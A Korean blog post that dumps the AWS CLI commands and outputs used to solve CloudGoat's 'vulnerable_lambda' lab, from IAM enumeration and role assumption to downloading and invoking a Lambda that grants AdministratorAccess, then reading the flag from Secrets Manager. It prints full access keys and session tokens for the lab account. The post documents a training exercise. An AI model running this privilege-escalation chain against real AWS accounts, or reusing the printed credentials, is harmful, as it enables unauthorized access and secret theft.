카테고리 없음
CloudGoat vulnerable lambda 명령 덤프
흑조롱이
2023. 11. 2. 07:12
CloudGoat의 vulnerable_lambda 문제에 사용한 명령어 및 결과를 정리한 덤프입니다.
아래에 나오는 "cg-bilbo-vulnerable_lambda_cgidfgo7f230y0"라는 유저는 현 시점에서 삭제한 상태입니다
$ aws configure --profile bilbo
AWS Access Key ID [None]: AKIAYVBD5ZHSWXYDYZMZ
AWS Secret Access Key [None]: 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
Default region name [None]: us-east-1
Default output format [None]:
$ aws --profile bilbo --region us-east-1 sts get-caller-identity
{
"UserId": "AIDAYVBD5ZHSXUIMDD3L5",
"Account": "594928323045",
"Arn": "arn:aws:iam::594928323045:user/cg-bilbo-vulnerable_lambda_cgidfgo7f230y0"
}
$ aws --profile bilbo --region us-east-1 iam list-user-policies --user-name cg-bilbo-vulnerable_lambda_cgidfgo7f230y0
{
"PolicyNames": [
"cg-bilbo-vulnerable_lambda_cgidfgo7f230y0-standard-user-assumer"
]
}
$ aws --profile bilbo --region us-east-1 iam get-user-policy --user-name cg-bilbo-vulnerable_lambda_cgidfgo7f230y0 --policy-name cg-bilbo-vulnerable_lambda_cgidfgo7f230y0-standard-user-assumer
{
"UserName": "cg-bilbo-vulnerable_lambda_cgidfgo7f230y0",
"PolicyName": "cg-bilbo-vulnerable_lambda_cgidfgo7f230y0-standard-user-assumer",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Effect": "Allow",
"Resource": "arn:aws:iam::940877411605:role/cg-lambda-invoker*",
"Sid": ""
},
{
"Action": [
"iam:Get*",
"iam:List*",
"iam:SimulateCustomPolicy",
"iam:SimulatePrincipalPolicy"
],
"Effect": "Allow",
"Resource": "*",
"Sid": ""
}
]
}
}
$ aws --profile bilbo --region us-east-1 iam list-roles | grep cg-
"RoleName": "cg-lambda-invoker-vulnerable_lambda_cgidfgo7f230y0",
"Arn": "arn:aws:iam::594928323045:role/cg-lambda-invoker-vulnerable_lambda_cgidfgo7f230y0",
"AWS": "arn:aws:iam::594928323045:user/cg-bilbo-vulnerable_lambda_cgidfgo7f230y0"
"RoleName": "cg-lambda-invoker-vulnerable_lambda_cgidkehm5l160m",
"Arn": "arn:aws:iam::594928323045:role/cg-lambda-invoker-vulnerable_lambda_cgidkehm5l160m",
"AWS": "arn:aws:iam::594928323045:user/cg-bilbo-vulnerable_lambda_cgidkehm5l160m"
$ aws --profile bilbo --region us-east-1 iam list-attached-user-policies --user-name cg-bilbo-vulnerable_lambda_cgidfgo7f230y0
{
"AttachedPolicies": []
}
$ aws --profile bilbo --region us-east-1 iam get-user-policy --user-name cg-bilbo-vulnerable_lambda_cgidfgo7f230y0 --policy-name cg-bilbo-vulnerable_lambda_cgidfgo7f230y0-standard-user-assumer
{
"UserName": "cg-bilbo-vulnerable_lambda_cgidfgo7f230y0",
"PolicyName": "cg-bilbo-vulnerable_lambda_cgidfgo7f230y0-standard-user-assumer",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Effect": "Allow",
"Resource": "arn:aws:iam::940877411605:role/cg-lambda-invoker*",
"Sid": ""
},
{
"Action": [
"iam:Get*",
"iam:List*",
"iam:SimulateCustomPolicy",
"iam:SimulatePrincipalPolicy"
],
"Effect": "Allow",
"Resource": "*",
"Sid": ""
}
]
}
}
$ aws --profile bilbo --region us-east-1 iam get-role-policy --role-name cg-lambda-invoker-vulnerable_lambda_cgidfgo7f230y0 --policy-name lambda-invoker
{
"RoleName": "cg-lambda-invoker-vulnerable_lambda_cgidfgo7f230y0",
"PolicyName": "lambda-invoker",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"lambda:ListFunctionEventInvokeConfigs",
"lambda:InvokeFunction",
"lambda:ListTags",
"lambda:GetFunction",
"lambda:GetPolicy"
],
"Effect": "Allow",
"Resource": [
"arn:aws:lambda:us-east-1:594928323045:function:vulnerable_lambda_cgidfgo7f230y0-policy_applier_lambda1",
"arn:aws:lambda:us-east-1:594928323045:function:vulnerable_lambda_cgidfgo7f230y0-policy_applier_lambda1"
]
},
{
"Action": [
"lambda:ListFunctions",
"iam:Get*",
"iam:List*",
"iam:SimulateCustomPolicy",
"iam:SimulatePrincipalPolicy"
],
"Effect": "Allow",
"Resource": "*"
}
]
}
}
$ aws --profile bilbo --region us-east-1 iam list-role-policies --role-name cg-lambda-invoker-vulnerable_lambda_cgidfgo7f230y0
{
"PolicyNames": [
"lambda-invoker"
]
}
$ aws --profile bilbo --region us-east-1 sts assume-role --role-arn arn:aws:iam::594928323045:role/cg-lambda-invoker-vulnerable_lambda_cgidfgo7f230y0 --role-session-name assumed_role
{
"Credentials": {
"AccessKeyId": "ASIAYVBD5ZHS6R3TCGJZ",
"SecretAccessKey": "QpUKzI2Nb/uv4/EjHV4uUpirwmBl6eOZ0/61EY2I",
"SessionToken": "IQoJb3JpZ2luX2VjEOX//////////wEaCXVzLWVhc3QtMSJHMEUCIQDItrXIvhvGmDEzUJZSfILmRWKiDYx5XkgDRit0vNqWxQIgH4aa+kb7F3zznCxZ9jsF8gIN+ThdSv2NTkZSnmelKbIqmQIIHRAAGgw1OTQ5MjgzMjMwNDUiDCneDkBEKg+GWSzZKSr2ATgxC1xy3UaRgA0Qzzja3kyUbrpBQgDakXrQsLvMtCCJPtMyCtm9vjCU0n5WVp8blNrgr5KMfYskXhhYpEkhK0/XvHqO5RTNc5Z1XY3QItytqIdXHdm5UlQBEIXW5GHPMtQm1lxv2V9s+HilgHcvYkZYw9bQCCnveWfBAfIiLM48DJDiyEdFLNuDbHbmvPqpPJD7aTXtdVu/xNfVE2RrbUA7otT86VFD6N8OJVtXHd4Td1qUQ1GobO1Hbl7IuA/nVvQw2Y5BjKAzKp2/Y7eIenY77K60jNOJ97Lbz7jZa8OgiNYe/W8OdmrbyGDDTrgXTUYialQXpjDi44qqBjqdAejhaybjlT4h1Jz6fvsjSl5V0YQfsdFhRDkT5I333IVSGazVkXKhTZAbJx5b6zG6khS7V0hIxO9bY64TX9dMNziQy+3FHMOcuLkGs83Rje9B+msp55XsTM4IL2qCGu8XpgIgYvmcikhp195gDKb/48eTZOFX9V7ZbTurgNo63s2GXecLoWvFC01GmNvcBziU8VzVWXmV5eKgC11tUXY=",
"Expiration": "2023-11-01T21:15:30+00:00"
},
"AssumedRoleUser": {
"AssumedRoleId": "AROAYVBD5ZHS45H7333D3:assumed_role",
"Arn": "arn:aws:sts::594928323045:assumed-role/cg-lambda-invoker-vulnerable_lambda_cgidfgo7f230y0/assumed_role"
}
}
$ aws configure --profile assumed_role
AWS Access Key ID [None]: ASIAYVBD5ZHS6R3TCGJZ
AWS Secret Access Key [None]: QpUKzI2Nb/uv4/EjHV4uUpirwmBl6eOZ0/61EY2I
Default region name [None]: us-east-1
Default output format [None]:
$ echo 'aws_session_token = IQoJb3JpZ2luX2VjEOX//////////wEaCXVzLWVhc3QtMSJHMEUCIQDItrXIvhvGmDEzUJZSfILmRWKiDYx5XkgDRit0vNqWxQIgH4aa+kb7F3zznCxZ9jsF8gIN+ThdSv2NTkZSnmelKbIqmQIIHRAAGgw1OTQ5MjgzMjMwNDUiDCneDkBEKg+GWSzZKSr2ATgxC1xy3UaRgA0Qzzja3kyUbrpBQgDakXrQsLvMtCCJPtMyCtm9vjCU0n5WVp8blNrgr5KMfYskXhhYpEkhK0/XvHqO5RTNc5Z1XY3QItytqIdXHdm5UlQBEIXW5GHPMtQm1lxv2V9s+HilgHcvYkZYw9bQCCnveWfBAfIiLM48DJDiyEdFLNuDbHbmvPqpPJD7aTXtdVu/xNfVE2RrbUA7otT86VFD6N8OJVtXHd4Td1qUQ1GobO1Hbl7IuA/nVvQw2Y5BjKAzKp2/Y7eIenY77K60jNOJ97Lbz7jZa8OgiNYe/W8OdmrbyGDDTrgXTUYialQXpjDi44qqBjqdAejhaybjlT4h1Jz6fvsjSl5V0YQfsdFhRDkT5I333IVSGazVkXKhTZAbJx5b6zG6khS7V0hIxO9bY64TX9dMNziQy+3FHMOcuLkGs83Rje9B+msp55XsTM4IL2qCGu8XpgIgYvmcikhp195gDKb/48eTZOFX9V7ZbTurgNo63s2GXecLoWvFC01GmNvcBziU8VzVWXmV5eKgC11tUXY=' >> ~/.aws/credentials
$ aws sts get-caller-identity --profile assumed_role
{
"UserId": "AROAYVBD5ZHS45H7333D3:assumed_role",
"Account": "594928323045",
"Arn": "arn:aws:sts::594928323045:assumed-role/cg-lambda-invoker-vulnerable_lambda_cgidfgo7f230y0/assumed_role"
}
$ aws --profile assumed_role --region us-east-1 lambda list-functions
{
"FunctionName": "vulnerable_lambda_cgidfgo7f230y0-policy_applier_lambda1",
"FunctionArn": "arn:aws:lambda:us-east-1:594928323045:function:vulnerable_lambda_cgidfgo7f230y0-policy_applier_lambda1",
"Runtime": "python3.9",
"Role": "arn:aws:iam::594928323045:role/vulnerable_lambda_cgidfgo7f230y0-policy_applier_lambda1",
"Handler": "main.handler",
"CodeSize": 991559,
"Description": "This function will apply a managed policy to the user of your choice, so long as the database says that it's okay...",
"Timeout": 3,
"MemorySize": 128,
"LastModified": "2023-11-01T19:49:31.775+0000",
"CodeSha256": "U982lU6ztPq9QlRmDCwlMKzm4WuOfbpbCou1neEBHkQ=",
"Version": "$LATEST",
"TracingConfig": {
"Mode": "PassThrough"
},
"RevisionId": "f9e502e5-6698-4920-8a68-4caae5cb0db2",
"PackageType": "Zip",
"Architectures": [
"x86_64"
],
"EphemeralStorage": {
"Size": 512
},
"SnapStart": {
"ApplyOn": "None",
"OptimizationStatus": "Off"
}
},
$ aws --profile assumed_role --region us-east-1 lambda get-function --function-name vulnerable_lambda_cgidfgo7f230y0-policy_applier_lambda1
{
"Configuration": {
"FunctionName": "vulnerable_lambda_cgidfgo7f230y0-policy_applier_lambda1",
"FunctionArn": "arn:aws:lambda:us-east-1:594928323045:function:vulnerable_lambda_cgidfgo7f230y0-policy_applier_lambda1",
"Runtime": "python3.9",
"Role": "arn:aws:iam::594928323045:role/vulnerable_lambda_cgidfgo7f230y0-policy_applier_lambda1",
"Handler": "main.handler",
"CodeSize": 991559,
"Description": "This function will apply a managed policy to the user of your choice, so long as the database says that it's okay...",
"Timeout": 3,
"MemorySize": 128,
"LastModified": "2023-11-01T19:49:31.775+0000",
"CodeSha256": "U982lU6ztPq9QlRmDCwlMKzm4WuOfbpbCou1neEBHkQ=",
"Version": "$LATEST",
"TracingConfig": {
"Mode": "PassThrough"
},
"RevisionId": "f9e502e5-6698-4920-8a68-4caae5cb0db2",
"State": "Active",
"LastUpdateStatus": "Successful",
"PackageType": "Zip",
"Architectures": [
"x86_64"
],
"EphemeralStorage": {
"Size": 512
},
"SnapStart": {
"ApplyOn": "None",
"OptimizationStatus": "Off"
},
"RuntimeVersionConfig": {
"RuntimeVersionArn": "arn:aws:lambda:us-east-1::runtime:25730c9630b4654f0753a405e39f452e48dad54fbcae4ce598d051c13d109bf8"
}
},
"Code": {
"RepositoryType": "S3",
"Location": "https://prod-iad-c1-djusa-tasks.s3.us-east-1.amazonaws.com/snapshots/594928323045/vulnerable_lambda_cgidfgo7f230y0-policy_applier_lambda1-820da079-f9db-46fd-a11d-922c01f0d95b?versionId=mhqtR2lW1rEmLKM2ZQs4uWE.kunZ0Ro9&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEOX%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIF25lVqhg639IuwN%2BbrFeZMGoFBOYPA35XqlSt5iZ44%2BAiBjode2DRkHPWwmlmHDNHTcFC0Tw3cEaHIItz7pnOep6Cq5BQgdEAQaDDQ3OTIzMzAyNTM3OSIMBE2UH1uU0059kmjBKpYF96OjA6boCMtTj%2Fp5UyY66pU%2B9MMUYrABV0vrd5wTVjFYGWUanQ2XFgPeil8tOXFHfDyQpFrHmNR0Z6s0vtj35BYZonhTpQyIJnQpTjm9N%2BTM7XY%2FTo5yh2ESwVEJhcVpYDY72wqtWETsfYVKoLyetYH1TyF%2F1zyemgVYNK77CFOcwb4e17qBNcfV06lWQPbEoU%2Fn35rki%2B9Pt71U%2BSm8McByYxQ5pLZjwBn%2B5GZLe2tH5CjGtb0SFrQzwGgR%2FXrVVzRiYmrRxqU0teFSv7QPehQKN9F8IDSGMrHhbk4TIgob3YHqexkJncn%2Fip4SukWJZx2fQ2XLrucrqm0OaR%2F8khw6NgsQ8qrqNvDhfM2InLywLEAsfDUvDR9qgSP864RVViw5LyftYazUN2o9IDKd3mwHnFS7bt4XnaQoS%2Bstyvcrfc6s0QbXXVSk6TDSm1OgPeZEAchPUnQcYflSwlDJzr44NpykXEayCU%2FNHZGXAl1jwmq4HONoMFw5Z5WWlJw0kLL2ZXWO2EX7GMgGr5aI%2Fv8XN6Eki99HqdjHKqgLxZwSriqPTK6IYo%2FfqCCBBOPHdqutHVOJyTsojVzO1Wwmh0pTtex5JVKvqZEO9DzJ9msf8Y8X8XgdVeoH4lDoBDSRJKi31wbRnxIbg9PkHQXEKK7q5449%2BHiqGQbcOvwuXqG01WNA4%2BqkhjENL4NpR5C%2FTlc0tcKlTTi6GlB2SvqOAHhEu3xJ286AshLbIwKBm0nYaU0r3TTy2CfxRyMdWwd5Tt3Llodf2VCPrrQR00BQzuygV3D4ZOV6kYUIhf%2BrS6wBxV%2BxDF7dQVx%2Bv1Jz5QkYaS1%2FgNV5QHLeLwrMVNouAcDqf4Y%2F45tc1ZfszrW0UgVvbdkt4pww4eWKqgY6sgHoDf4xK98KzzYgXxUMHgwtm%2Fka5ronL98ZFCdUAJEiTi36HcXVUAWaX0MiRmw1HGIROWPzSEZNXZ2AkOws4U%2FKLR9GCOccY4G59japDXIEHZKzLcwbNMviehZ4jLF%2BIEHsBRjlmakcglNXDi90K6cgmCfHwdCdBo0peDIw6ppxOnEyIfTq%2Bsfq4XWFSF%2F15fIvas9R0AZTeUNsFmXc5YyVCplkcYThiQUo5uQ2sgVVi%2B38&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20231101T203107Z&X-Amz-SignedHeaders=host&X-Amz-Expires=600&X-Amz-Credential=ASIAW7FEDUVR65HWNDDO%2F20231101%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=ec3d1668b93db10f79b01273bd49e6e1a778ca7d322a8efb032b265f4ce177c6"
},
"Tags": {
"Name": "cg-vulnerable_lambda_cgidfgo7f230y0",
"Scenario": "vulnerable-lambda",
"Stack": "CloudGoat"
}
}
$ wget "https://prod-iad-c1-djusa-tasks.s3.us-east-1.amazonaws.com/snapshots/594928323045/vulnerable_lambda_cgidfgo7f230y0-policy_applier_lambda1-820da079-f9db-46fd-a11d-922c01f0d95b?versionId=mhqtR2lW1rEmLKM2ZQs4uWE.kunZ0Ro9&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEOX%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIF25lVqhg639IuwN%2BbrFeZMGoFBOYPA35XqlSt5iZ44%2BAiBjode2DRkHPWwmlmHDNHTcFC0Tw3cEaHIItz7pnOep6Cq5BQgdEAQaDDQ3OTIzMzAyNTM3OSIMBE2UH1uU0059kmjBKpYF96OjA6boCMtTj%2Fp5UyY66pU%2B9MMUYrABV0vrd5wTVjFYGWUanQ2XFgPeil8tOXFHfDyQpFrHmNR0Z6s0vtj35BYZonhTpQyIJnQpTjm9N%2BTM7XY%2FTo5yh2ESwVEJhcVpYDY72wqtWETsfYVKoLyetYH1TyF%2F1zyemgVYNK77CFOcwb4e17qBNcfV06lWQPbEoU%2Fn35rki%2B9Pt71U%2BSm8McByYxQ5pLZjwBn%2B5GZLe2tH5CjGtb0SFrQzwGgR%2FXrVVzRiYmrRxqU0teFSv7QPehQKN9F8IDSGMrHhbk4TIgob3YHqexkJncn%2Fip4SukWJZx2fQ2XLrucrqm0OaR%2F8khw6NgsQ8qrqNvDhfM2InLywLEAsfDUvDR9qgSP864RVViw5LyftYazUN2o9IDKd3mwHnFS7bt4XnaQoS%2Bstyvcrfc6s0QbXXVSk6TDSm1OgPeZEAchPUnQcYflSwlDJzr44NpykXEayCU%2FNHZGXAl1jwmq4HONoMFw5Z5WWlJw0kLL2ZXWO2EX7GMgGr5aI%2Fv8XN6Eki99HqdjHKqgLxZwSriqPTK6IYo%2FfqCCBBOPHdqutHVOJyTsojVzO1Wwmh0pTtex5JVKvqZEO9DzJ9msf8Y8X8XgdVeoH4lDoBDSRJKi31wbRnxIbg9PkHQXEKK7q5449%2BHiqGQbcOvwuXqG01WNA4%2BqkhjENL4NpR5C%2FTlc0tcKlTTi6GlB2SvqOAHhEu3xJ286AshLbIwKBm0nYaU0r3TTy2CfxRyMdWwd5Tt3Llodf2VCPrrQR00BQzuygV3D4ZOV6kYUIhf%2BrS6wBxV%2BxDF7dQVx%2Bv1Jz5QkYaS1%2FgNV5QHLeLwrMVNouAcDqf4Y%2F45tc1ZfszrW0UgVvbdkt4pww4eWKqgY6sgHoDf4xK98KzzYgXxUMHgwtm%2Fka5ronL98ZFCdUAJEiTi36HcXVUAWaX0MiRmw1HGIROWPzSEZNXZ2AkOws4U%2FKLR9GCOccY4G59japDXIEHZKzLcwbNMviehZ4jLF%2BIEHsBRjlmakcglNXDi90K6cgmCfHwdCdBo0peDIw6ppxOnEyIfTq%2Bsfq4XWFSF%2F15fIvas9R0AZTeUNsFmXc5YyVCplkcYThiQUo5uQ2sgVVi%2B38&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20231101T203107Z&X-Amz-SignedHeaders=host&X-Amz-Expires=600&X-Amz-Credential=ASIAW7FEDUVR65HWNDDO%2F20231101%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=ec3d1668b93db10f79b01273bd49e6e1a778ca7d322a8efb032b265f4ce177c6"
$ aws --profile assumed_role --region us-east-1 lambda invoke --function-name vulnerable_lambda_cgidfgo7f230y0-policy_applier_lambda1 --cli-binary-format raw-in-base64-out --payload file://./payload.json out.txt
{
"StatusCode": 200,
"ExecutedVersion": "$LATEST"
}
$ aws --profile bilbo --region us-east-1 iam list-attached-user-policies --user-name cg-bilbo-vulnerable_lambda_cgidfgo7f230y0
{
"AttachedPolicies": [
{
"PolicyName": "AdministratorAccess",
"PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess"
}
]
}
$ aws --profile bilbo --region us-east-1 secretsmanager list-secrets
{
"ARN": "arn:aws:secretsmanager:us-east-1:594928323045:secret:vulnerable_lambda_cgidfgo7f230y0-final_flag-J3HfNQ",
"Name": "vulnerable_lambda_cgidfgo7f230y0-final_flag",
"LastChangedDate": "2023-11-01T15:49:22.315000-04:00",
"LastAccessedDate": "2023-10-31T20:00:00-04:00",
"Tags": [
{
"Key": "Stack",
"Value": "CloudGoat"
},
{
"Key": "Name",
"Value": "cg-vulnerable_lambda_cgidfgo7f230y0"
},
{
"Key": "Scenario",
"Value": "vulnerable-lambda"
}
],
"SecretVersionsToStages": {
"BFFF9756-F840-4506-91EA-7984C8DA3F64": [
"AWSCURRENT"
]
},
"CreatedDate": "2023-11-01T15:49:21.597000-04:00"
}
$ aws --profile bilbo --region us-east-1 secretsmanager get-secret-value --secret-id arn:aws:secretsmanager:us-east-1:594928323045:secret:vulnerable_lambda_cgidfgo7f230y0-final_flag-J3HfNQ
{
"ARN": "arn:aws:secretsmanager:us-east-1:594928323045:secret:vulnerable_lambda_cgidfgo7f230y0-final_flag-J3HfNQ",
"Name": "vulnerable_lambda_cgidfgo7f230y0-final_flag",
"VersionId": "BFFF9756-F840-4506-91EA-7984C8DA3F64",
"SecretString": "cg-secret-846237-284529",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": "2023-11-01T15:49:22.310000-04:00"
}